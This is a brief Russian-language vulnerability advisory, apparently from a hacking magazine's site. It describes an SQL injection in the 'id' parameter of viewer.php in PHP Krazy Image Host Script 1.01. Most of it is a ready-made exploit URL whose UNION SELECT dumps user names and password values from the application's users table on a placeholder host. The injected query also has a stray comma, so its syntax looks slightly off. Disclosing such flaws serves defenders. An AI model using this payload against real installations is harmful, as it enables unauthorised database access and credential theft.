Рекомендуем почитать:
Хакер #305. Многошаговые SQL-инъекции
Программа: PHP Krazy Image Host Script 1.01
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL
команды в базе данных приложения. Уязвимость существует из-за недостаточной
обработки входных данных в параметре «id» сценарием viewer.php. Удаленный
пользователь может с помощью специально сформированного запроса выполнить
произвольные SQL команды в базе данных приложения.
Эксплоит:
http://victim.it/viewer.php?id=-1 union select
0,0,0,concat(id,char(45),user,char(45),password),0,0, from users--